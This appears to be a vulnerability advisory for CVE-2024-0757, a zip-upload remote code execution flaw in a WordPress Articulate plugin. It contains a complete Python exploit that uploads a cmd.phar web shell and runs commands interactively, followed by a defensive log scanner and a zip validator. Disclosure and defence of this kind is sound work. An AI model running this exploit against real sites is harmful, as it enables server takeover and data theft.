In recent years, WordPress has become a predominant platform for website development thanks to its user-friendly interface and extensive plugin ecosystem. That popularity also makes it a prime target for attackers. One such critical vulnerability, identified as CVE-2024-0757, allows remote code execution (RCE) in the Insert or Embed Articulate Content into WordPress plugin: a user with contributor rights can upload a zip archive whose contents are not validated, so executable files inside it land on the server. This article covers the discovery, exploitation, and potential impact of this vulnerability, along with recommendations for securing WordPress installations.
CVE | CVE-2024-0757 |
Plugin | Insert or Embed Articulate Content into WordPress <= 4.3000000023 |
Criticality | Very High |
Downloads (all time) | 122 027 |
Active installations | 3 000+ |
Publicly Published | May 14, 2024 |
Last Updated | May 14, 2024 |
Researcher | Dmitrii Ignatyev |
OWASP TOP-10 | A1: Injection |
PoC | Yes |
Exploit | No |
Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0757 |
Reference | https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/ |
Plugin Security Certification by CleanTalk | |
Timeline
January 16, 2024 | Plugin testing and vulnerability detection in the Insert or Embed Articulate Content into WordPress plugin were completed |
January 16, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
May 14, 2024 | Registered CVE-2024-0757 |
Discovery of the Vulnerability
The CVE-2024-0757 vulnerability was discovered during routine testing of a popular WordPress plugin used for inserting or embedding Articulate content. This plugin is commonly employed to integrate e-learning content into WordPress sites. The vulnerability lies in the file upload mechanism: authors can upload zip files containing e-learning content, and the plugin extracts them into the uploads directory without checking what they contain. An attacker can therefore embed executable files within the zip archive, which leads to code execution on the server once the extracted file is requested over HTTP.
Understanding Remote Code Execution (RCE) attacks
Remote Code Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary code on a server remotely. In the context of WordPress, RCE can have devastating effects, enabling attackers to take control of the website, steal data, or deface web pages. Historically, WordPress and its plugins have faced several RCE vulnerabilities. For example, in 2020, a vulnerability in the File Manager plugin allowed attackers to upload malicious files and execute commands, highlighting the significant threat posed by insecure file upload mechanisms.
Exploiting the RCE Vulnerability
Exploiting CVE-2024-0757 involves a few straightforward steps:
POC:
1) Go to http://your_site/wordpress/wp-admin/post-new.php and create a new post.
2) Add the e-Learning widget to the page and upload a zip file containing two files: a default HTML file such as main.html, and a Phar file such as cmd.phar that contains PHP code.
3) After the upload, check the URL http://your_site/wordpress/wp-content/uploads/articulate_uploads/{name_of_zip}/cmd.phar?cmd=ls
4) You can use the following exploit:
____
import requests
import sys
import urllib3
import re

urllib3.disable_warnings()


def send_request(host, login, password):
    # Log in to WordPress with the contributor account.
    target = f"{host}/wp-login.php"
    print(target)
    s = requests.Session()
    data = {
        "log": f"{login}",
        "pwd": f"{password}",
        "wp-submit": "Log In",
        "redirect_to": "http://127.0.0.1/wp-admin/",
        "testcookie": "1"
    }
    request = s.post(target, data=data)

    # Open the new-post editor and read the plugin's upload nonce and the post ID.
    nonce_url = f"{host}/wp-admin/post-new.php"
    nonce_text = s.get(nonce_url)
    nonce_array = re.search(r'_upload_file":"(.*?)","_nonce_', nonce_text.text)
    nonce = nonce_array.group(1)
    new_id_array = re.search(r"<input type='hidden' id='post_ID' name='post_ID' value='(.*)' />", nonce_text.text)
    new_id = new_id_array.group(1)
    print("Nonce value: " + nonce)
    print("New Post Id: " + new_id)

    # Upload test.zip through the plugin's admin-ajax action (see PoC step 2).
    upload_url = f"{host}/wp-admin/admin-ajax.php"
    upload_files = {
        "async-upload": ('test.zip', open('test.zip', 'rb'), 'application/zip')
    }
    data_upload = {
        "chunk": "0",
        "chunks": "1",
        "_ajax_nonce": f"{nonce}",
        "action": "articulate_upload_file"
    }
    upload = s.post(upload_url, data=data_upload, files=upload_files)
    upload_regex = re.search(r'folder":"(.*?)","path', upload.text)

    # Interactive loop against the extracted cmd.phar (see PoC step 3).
    while True:
        print(" ")
        print("Pwn3d!!! \n------- Try to use command:")
        print('')
        cmd = ''
        cmd_user = input("cmd > ")
        if cmd_user == 'exit':
            rce_url = f"{host}/wp-content/uploads/articulate_uploads/{upload_regex.group(1)}/cmd.phar?cmd=rm -r ../{upload_regex.group(1)}"
            rce = requests.get(rce_url)
            print('')
            print(rce.text)
            print('Good!')
            break
        else:
            rce_url = f"{host}/wp-content/uploads/articulate_uploads/{upload_regex.group(1)}/cmd.phar?cmd={cmd_user}"
            rce = requests.get(rce_url)
            print('')
            print(rce.text)
            print('[*]')


def main():
    if len(sys.argv) != 4:
        print("(+) usage: %s <target_url> <login_of_contributor> <password>" % sys.argv[0])
        print('(+) eg: %s http://192.168.121.103/wordpress login password' % sys.argv[0])
        sys.exit(-1)
    host = sys.argv[1]
    login = sys.argv[2]
    password = sys.argv[3]
    send_request(host, login, password)


if __name__ == "__main__":
    main()
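Every run of the PoC ends with GET requests for a .phar file under wp-content/uploads/articulate_uploads/, which the web server records in its access log. The following Python is an added example for defenders, not part of the original advisory or of the plugin: it parses a few constructed combined-log-format lines and flags any request that reaches a file with a PHP-executable extension below the plugin's upload directory, including nested paths. The log format, IP addresses and the extension list are assumptions for the sake of the example.

```python
import re

# Extensions a typical PHP-enabled web server executes rather than serves.
# ".phar" is listed because the PoC above drops a cmd.phar into the uploads.
EXECUTABLE_EXT = {"php", "phar", "phtml", "php3", "php4", "php5", "php7", "phps", "pht"}

# Combined log format: ip ident user [timestamp] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Anything below the plugin's upload directory: the extracted archive folder,
# then the rest of the path (possibly nested), then an optional query string.
UPLOAD_RE = re.compile(
    r'/wp-content/uploads/articulate_uploads/(?P<folder>[^/?]+)/'
    r'(?P<subpath>[^?]+)(?:\?(?P<query>.*))?$'
)


def classify_request(path):
    """Return a finding dict for a request to an executable file under
    articulate_uploads, or None for anything else."""
    m = UPLOAD_RE.search(path)
    if m is None:
        return None
    filename = m.group("subpath").rsplit("/", 1)[-1]
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in EXECUTABLE_EXT:
        return None
    return {"folder": m.group("folder"), "file": filename, "query": m.group("query") or ""}


def scan_access_log(lines):
    """Parse access-log lines and return findings enriched with source IP,
    timestamp and HTTP status, in log order."""
    findings = []
    for line in lines:
        lm = LOG_RE.match(line)
        if lm is None:
            continue
        hit = classify_request(lm.group("path"))
        if hit is not None:
            hit.update(ip=lm.group("ip"), ts=lm.group("ts"), status=lm.group("status"))
            findings.append(hit)
    return findings


# Constructed sample log lines (documentation-range IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [14/May/2024:10:01:02 +0000] "POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/May/2024:10:01:05 +0000] "GET /wordpress/wp-content/uploads/articulate_uploads/test/cmd.phar?cmd=ls HTTP/1.1" 200 233',
    '198.51.100.4 - - [14/May/2024:10:02:00 +0000] "GET /wordpress/wp-content/uploads/articulate_uploads/course1/main.html HTTP/1.1" 200 4096',
    '203.0.113.7 - - [14/May/2024:10:03:10 +0000] "GET /wordpress/wp-content/uploads/articulate_uploads/test/cmd.phar HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['folder']}/{f['file']} query={f['query']!r} status={f['status']}")
```

A 200 status on such a request means the file was both present and executed, so the incident response step is to treat that upload folder as compromised, not merely to delete the file. A 403 or 404 on the same pattern is still worth alerting on, because it shows someone probing for the bug.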
The potential risk of this vulnerability is significant, particularly for websites that allow multiple authors. An attacker exploiting this flaw could gain complete control over the WordPress site, leading to data breaches, website defacement, or the installation of further malicious software. In a real-world scenario, an attacker could leverage this vulnerability to exfiltrate sensitive data, deploy ransomware, or use the compromised site to launch further attacks against visitors.
Recommendations for Improved Security
To mitigate the risk posed by CVE-2024-0757 and similar vulnerabilities, the following measures are recommended:
- Plugin Security Reviews: Regularly audit and review plugins for security vulnerabilities, especially those handling file uploads.
- Restrict File Uploads: Limit file upload capabilities to trusted users and employ robust validation checks on uploaded files.
- Use Security Plugins: Implement security plugins that can detect and block suspicious activities, such as unexpected file uploads.
- Regular Backups: Maintain regular backups of your site to quickly recover in case of a security breach.
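The "Restrict File Uploads" recommendation above, and the description of the flaw in the Discovery section, both come down to one missing step: inspecting the archive before extracting it. The following Python is an added example and is not code from the plugin or from CleanTalk; it shows the checks a zip upload handler should run over the entry list and contents before anything is written to disk. The extension allowlist, size limits and the in-memory sample archives are constructed assumptions; the archive layout of the rejected sample (main.html plus cmd.phar) mirrors the PoC.

```python
import io
import posixpath
import stat
import zipfile

# Extensions an e-learning export legitimately contains (constructed allowlist;
# tune it to what your exports actually use).
ALLOWED_EXT = {"html", "htm", "js", "css", "json", "xml", "txt", "png", "jpg",
               "jpeg", "gif", "svg", "woff", "woff2", "ttf", "mp3", "mp4", "ogg", "webm"}
# Extensions that must not appear anywhere in a filename, even as a middle
# segment (e.g. "shell.php.txt"), because some server configurations run them.
EXECUTABLE_EXT = {"php", "phar", "phtml", "php3", "php4", "php5", "php7",
                  "phps", "pht", "cgi", "pl", "py", "sh"}
# Files that reconfigure the web server or PHP for the directory they land in.
FORBIDDEN_NAMES = {".htaccess", ".user.ini", "web.config"}
MAX_ENTRIES = 20_000
MAX_TOTAL_BYTES = 512 * 1024 * 1024   # uncompressed cap against zip bombs
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def check_entry_name(name, is_dir=False):
    """Return the problems with one archive entry name (empty list = acceptable)."""
    problems = []
    if name.startswith("/") or "\\" in name or ".." in name.split("/"):
        problems.append(f"{name}: absolute path or traversal component")
    if is_dir:
        return problems
    base = posixpath.basename(name)
    if base.lower() in FORBIDDEN_NAMES:
        problems.append(f"{name}: server configuration file")
    segments = base.lower().split(".")
    if len(segments) < 2 or segments[-1] not in ALLOWED_EXT:
        problems.append(f"{name}: extension not in allowlist")
    elif any(seg in EXECUTABLE_EXT for seg in segments[1:-1]):
        problems.append(f"{name}: executable extension hidden in filename")
    return problems


def validate_archive(data):
    """Inspect a zip upload before extraction; return reasons to reject it
    (empty list = accept)."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip archive"]
    problems = []
    with zf:
        infos = zf.infolist()
        if len(infos) > MAX_ENTRIES:
            problems.append(f"too many entries ({len(infos)})")
        total = sum(i.file_size for i in infos)
        if total > MAX_TOTAL_BYTES:
            problems.append(f"uncompressed size {total} exceeds limit")
        if problems:
            return problems          # do not read the contents of a hostile archive
        for info in infos:
            if stat.S_ISLNK(info.external_attr >> 16):
                problems.append(f"{info.filename}: symbolic link")
            problems.extend(check_entry_name(info.filename, info.is_dir()))
            if not info.is_dir():
                with zf.open(info) as fh:
                    content = fh.read()
                # Defence in depth: a PHP open tag in an "allowed" file is still a red flag.
                if any(tag in content for tag in PHP_OPEN_TAGS):
                    problems.append(f"{info.filename}: contains a PHP open tag")
    return problems


def build_sample_zip(files):
    """Build an in-memory zip from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


CLEAN_UPLOAD = build_sample_zip({
    "course/main.html": b"<html><body>lesson</body></html>",
    "course/story_content/player.min.js": b"// constructed placeholder script",
})
# Same layout as the PoC archive: a harmless HTML page plus a .phar file.
POC_LIKE_UPLOAD = build_sample_zip({
    "course/main.html": b"<html><body>lesson</body></html>",
    "course/cmd.phar": b"<?php /* constructed placeholder, no real payload */",
})
TRAVERSAL_UPLOAD = build_sample_zip({"../outside.html": b"<html></html>"})

if __name__ == "__main__":
    for label, blob in [("clean", CLEAN_UPLOAD), ("poc-like", POC_LIKE_UPLOAD), ("traversal", TRAVERSAL_UPLOAD)]:
        print(label, validate_archive(blob) or "accepted")
```

The allowlist is the important design choice: a denylist of "bad" extensions is only as complete as the author's memory, whereas an allowlist fails closed when a new executable extension appears. Rejecting the whole archive on the first problem, rather than silently dropping the offending entry, also gives the uploader a clear error and leaves nothing half-extracted in the uploads directory.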
By taking proactive measures to address RCE vulnerabilities like CVE-2024-0757, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
DMITRII I.
This was fixed in 4.3000000023 back in January 2024 – I’m not sure why this one was ever published. You can see the release notes here:
https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/#developers
Hello Brian.
Thank you for your comment.
We will verify the information and respond to you within 3 business days.
Hello,
Thank you for waiting.
The publication of a vulnerability is part of a security process aimed at transparency and informing the community. Even if a vulnerability has been fixed, the community has the right to know about the issues developers faced and how they were resolved. Publishing a vulnerability can serve an educational purpose, helping other developers and organizations learn from past mistakes. This contributes to the improvement of development practices and the overall enhancement of security. Providing information about resolved vulnerabilities allows users to understand the importance of installing updates and maintaining up-to-date software versions. This helps reduce risks and protect user data.
Best regards.